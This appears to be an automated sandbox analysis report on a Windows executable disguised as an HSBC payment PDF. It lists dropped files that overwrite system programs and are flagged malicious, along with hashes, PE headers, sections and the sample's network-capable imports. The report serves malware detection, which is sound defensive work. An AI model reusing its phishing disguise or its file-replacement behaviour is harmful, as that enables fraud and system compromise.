                                                                                                                                                  SHA-256:CA480732910F54E3F7DBED72AB4B7CB446B722F00648AAA773EDFEEC7CBB8CFE
                                                                                                                                                  SHA-512:1E05536BD49790960CB431210444519737B1CD992B7349FD657A03C4BF8B3774166E56466E3FB8A7598249EAAA66F6ACC8335889B244A3148401C9EA1A3A1EB0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@..............................!.....y..... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...`...........B..............@...................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\msiexec.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1355264
                                                                                                                                                  Entropy (8bit):4.598885488341672
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:N4K/iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:JL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:D7A658B63143C365E02DD9D724AD3840
                                                                                                                                                  SHA1:EB1E3170724AEAE9AF30E61CC6FACDF957DEA873
                                                                                                                                                  SHA-256:45949E2186CE94804ED4EC0E01971FDDB69CFAB80226E5F55041A4BAAF7FB406
                                                                                                                                                  SHA-512:E14769CAC89956AFE04CAE56384B31BE29C07F8BE38FF36E584B64FF5BFDECAFD69DAD664E7976DA96A1A7DB31983A97BE0036F8F0870E79477B17F9D1412A31
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.......................................... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...`...`......................@...........................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\snmptrap.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1302528
                                                                                                                                                  Entropy (8bit):4.527040434349369
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:MyjiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:5X/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:772AEFCF949CAADFB515863053AC8C10
                                                                                                                                                  SHA1:CD6841C3254DC4E2BC897E4F5A4427746D475734
                                                                                                                                                  SHA-256:5A63AE25B170F220DFD3917FB99556EA2D27374A14031825B94BF873C247CE94
                                                                                                                                                  SHA-512:F4BD2427D42662042A47E6BFB0E37C5B6B2FBB0298AF0E58343F4266ED777F0B1AF4AFD78567F238C82A10DCD5470AFFF406F3A1B1DB0FD2010DDF7C8FAB9578
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@.....................................,.... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\vds.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1303552
                                                                                                                                                  Entropy (8bit):7.160771851397377
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:uZ0FxT1UoYr99GdcJKa/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ewWsaLNiXicJFFRGNzj3
                                                                                                                                                  MD5:9B69326495A6A2E148AF298DBBFA354E
                                                                                                                                                  SHA1:82815DC8511D21F4C1FE29B141281B3BEE33E8E0
                                                                                                                                                  SHA-256:4DDFEE120EA068531DA75B2B8F648285530A956AEB1A378B65350723061197D3
                                                                                                                                                  SHA-512:258529C02ECE28F4171E7B0AA0C8F6629B0FFC4D3DD75FF97F60AEB6A06FF40506B57B463A5411E65CEB93012F61134DE8FBF4E661F82C8BAD8C9DAE3B540364
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@.......q.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\wbem\WmiApSrv.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1495040
                                                                                                                                                  Entropy (8bit):4.819230946517786
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:WyocDApp/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:rocDAppLNiXicJFFRGNzj3
                                                                                                                                                  MD5:42D1E4DE254C4ADA4E059B64BB6A2DA2
                                                                                                                                                  SHA1:BB8DCEC95945C60B4C30973CEC4F742C0150DDD4
                                                                                                                                                  SHA-256:EF251D95C25C2E13F342F74DB95F09447459AC67037C13854C0D4BAE9E269B6E
                                                                                                                                                  SHA-512:358F9828583B30C609E8845DE4EB30852416FCB057D2AD7452609B14D0F93DB1DD41F44CA62953F5976A7A356A1B9C01B01EBBCEF55EE5942531321E027104F1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@..............................!......8.... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...`...p.......0..............@...........................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\System32\wbengine.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2164736
                                                                                                                                                  Entropy (8bit):7.056807539909686
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:2WcnPqQUGpuphwC0DNLDpaRFXrLuWGMK8IKNLNiXicJFFRGNzj3:A0zuNIL7wRGpj3
                                                                                                                                                  MD5:A4B1E47A80405B400B4460F9F65BA8E2
                                                                                                                                                  SHA1:2F8D7999DDE29E014E9AAEF7AE31E83FA61A0EC6
                                                                                                                                                  SHA-256:B349770F612AFAFA4C40BCBCC5C24CBCAA4855D93F7514316165531A72173AE7
                                                                                                                                                  SHA-512:4FF1019AA404E4D48D7397753DE677AA89106142C2199C3E67342EBD58B7FEC0DA93A80C7FACB802D438568B55ACB960C024D5EFC6010563CC6DCE641A41109F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.....#.!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.10003927087197158
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:s93l/k/uMclF6vMclFq5zrscAXNOn+SkUeYDwDzym9j:s9V/kqF69Fq5zraO+pawHymZ
                                                                                                                                                  MD5:88BAEEDA6B424A129F7F84FDBFBB1F77
                                                                                                                                                  SHA1:BEF6A8A160AC6D8070D969FCB2CA1833B4B9A38C
                                                                                                                                                  SHA-256:0D6DB9F917DA4EA7770582FFD55EC42F5999BDF92E110CFFD04CDC1D8036424A
                                                                                                                                                  SHA-512:385FFDE111C1BCFB10C9C72A57D7E48C5216563BEC15431771BBAF0A040FEC6AC101ED2E09F8CCE4B44D60669EF754F8776BB5CB22DBE09C84C80BD8589EF0BF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:....`...`.......................................`...!......................................X....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`..............!!K..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P............X....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.10143017812085664
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:Vl6Vkl963l/k/uMclF6vMclFq5zrYXXNMu3n+SkUeYDwDzyMFkl9jb:Vl6VklAV/kqF69Fq5zrYtX+pawHyekld
                                                                                                                                                  MD5:64C903E0BE604F3C55244D021D09645E
                                                                                                                                                  SHA1:DB4F1C2EA6C8A272EECA71497120659B0130A2F4
                                                                                                                                                  SHA-256:945A7C52F9FFF79679073B13A56DBC10930F015C59EFF4973A6BDF4AF1B3535D
                                                                                                                                                  SHA-512:81AEB8CE23E7943809C194B4FC4C1902DFF6275FC93CEFC2BD5EDD262473C783489947EFA3B5C8AC312FD1DDFEA50A9FE94D0054A13BCF3B4CFF4D4C10970556
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:....h...h.......................................h...!....................................J.X....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`...........h$.!!K..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P..........J.X............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.09864643853404176
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:u5wl43Nk/uMclF6vMclFq5zrbXNIn+SkUeYDwDzyjlhr:uG49kqF69Fq5zr5I+pawHyZF
                                                                                                                                                  MD5:46C0D3FAD0A9A7025396CDA398B47A6A
                                                                                                                                                  SHA1:621C3CEA50FCAF27A9C673C9C934F94BB6A08F5C
                                                                                                                                                  SHA-256:1CFC79415019460B5CC2015B64DEBCD230F6C25B0492D13FB7F479E38C61FB3B
                                                                                                                                                  SHA-512:6C3BF5CD0FADE35D518090CAE7F2859868C87E1F56060C61B2B980918E3B663EE960DF00507002FDC0F49407706D66D5869C401B70D57416118FE4D7EAACF73B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:....X...X.......................................X...!....................................e.X....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`...........=@.!!K..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P..........e.X............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):7.383615153647671
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                  File name:HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File size:1'539'072 bytes
                                                                                                                                                  MD5:999146408efd1a704966ca4c1c8ce4b7
                                                                                                                                                  SHA1:0dc0a9373154d562c47c04d27977f483d385ea1b
                                                                                                                                                  SHA256:a36f4ee96ff62eee2a503838850d7dce90aabc36a704b742b6814f187618f3c1
                                                                                                                                                  SHA512:8e99a68c23b8185902c73c19d980f4fc309002498bfc1344fded06dd1c001927e9597430e2c7afdfed30a913a48116750d652301cba05dc13d2ed04156be6389
                                                                                                                                                  SSDEEP:24576:bu6J3kO0c+JY5UZ+XC0kGso6FaboeVGQjWYy/TwSfVcYG3K/cJHlnFR+IGNe8j3w:VJ0c++OCvkGs9FabozYyLNiXicJFFRGN
                                                                                                                                                  TLSH:3D65DF2273DDC360CB769173BF29B7016EBB7C654630B85B2F881D7DA960262162C763
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x427dcd
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x67584016 [Tue Dec 10 13:20:22 2024 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:5
                                                                                                                                                  OS Version Minor:1
                                                                                                                                                  File Version Major:5
                                                                                                                                                  File Version Minor:1
                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  call 00007F50C934D9CAh
                                                                                                                                                  jmp 00007F50C9340794h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  push edi
                                                                                                                                                  push esi
                                                                                                                                                  mov esi, dword ptr [esp+10h]
                                                                                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                                                                                  mov eax, ecx
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  add eax, esi
                                                                                                                                                  cmp edi, esi
                                                                                                                                                  jbe 00007F50C934091Ah
                                                                                                                                                  cmp edi, eax
                                                                                                                                                  jc 00007F50C9340C7Eh
                                                                                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                                                                                  jnc 00007F50C9340919h
                                                                                                                                                  rep movsb
                                                                                                                                                  jmp 00007F50C9340C2Ch
                                                                                                                                                  cmp ecx, 00000080h
                                                                                                                                                  jc 00007F50C9340AE4h
                                                                                                                                                  mov eax, edi
                                                                                                                                                  xor eax, esi
                                                                                                                                                  test eax, 0000000Fh
                                                                                                                                                  jne 00007F50C9340920h
                                                                                                                                                  bt dword ptr [004BE324h], 01h
                                                                                                                                                  jc 00007F50C9340DF0h
                                                                                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                                                                                  jnc 00007F50C9340ABDh
                                                                                                                                                  test edi, 00000003h
                                                                                                                                                  jne 00007F50C9340ACEh
                                                                                                                                                  test esi, 00000003h
                                                                                                                                                  jne 00007F50C9340AADh
                                                                                                                                                  bt edi, 02h
                                                                                                                                                  jnc 00007F50C934091Fh
                                                                                                                                                  mov eax, dword ptr [esi]
                                                                                                                                                  sub ecx, 04h
                                                                                                                                                  lea esi, dword ptr [esi+04h]
                                                                                                                                                  mov dword ptr [edi], eax
                                                                                                                                                  lea edi, dword ptr [edi+04h]
                                                                                                                                                  bt edi, 03h
                                                                                                                                                  jnc 00007F50C9340923h
                                                                                                                                                  movq xmm1, qword ptr [esi]
                                                                                                                                                  sub ecx, 08h
                                                                                                                                                  lea esi, dword ptr [esi+08h]
                                                                                                                                                  movq qword ptr [edi], xmm1
                                                                                                                                                  lea edi, dword ptr [edi+08h]
                                                                                                                                                  test esi, 00000007h
                                                                                                                                                  je 00007F50C9340975h
                                                                                                                                                  bt esi, 03h
                                                                                                                                                  jnc 00007F50C93409C8h

                                                                                                                                                  Rich Headers

                                                                                                                                                  Programming Language:
                                                                                                                                                  • [ASM] VS2013 build 21005
                                                                                                                                                  • [ C ] VS2013 build 21005
                                                                                                                                                  • [C++] VS2013 build 21005
                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                                                                                  • [RES] VS2013 build 21005
                                                                                                                                                  • [LNK] VS2013 UPD4 build 31101

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x215d4.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000x8dcc40x8de0097dfc7b2f276cc62b8add396864a3c11False0.5728679102422908data6.676121964802359IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .rsrc0xc70000x215d40x21600e28ac6d840d9d7c4d039c1d19eeb3423False0.8039633075842697data7.541829559863074IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0xe90000x960000x95000591e6f13fe6b350236243071c1222817False0.9705409107592282data7.920472610831056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                                                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                                                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                                                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                                                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                                                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                                                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                                                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                                                                                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                  RT_RCDATA0xcf7b80x1889adata1.0004079358446263
                                                                                                                                                  RT_GROUP_ICON0xe80540x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                                  RT_GROUP_ICON0xe80cc0x14dataEnglishGreat Britain1.25
                                                                                                                                                  RT_GROUP_ICON0xe80e00x14dataEnglishGreat Britain1.15
                                                                                                                                                  RT_GROUP_ICON0xe80f40x14dataEnglishGreat Britain1.25
                                                                                                                                                  RT_VERSION0xe81080xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                  RT_MANIFEST0xe81e40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                  UxTheme.dllIsThemeActive
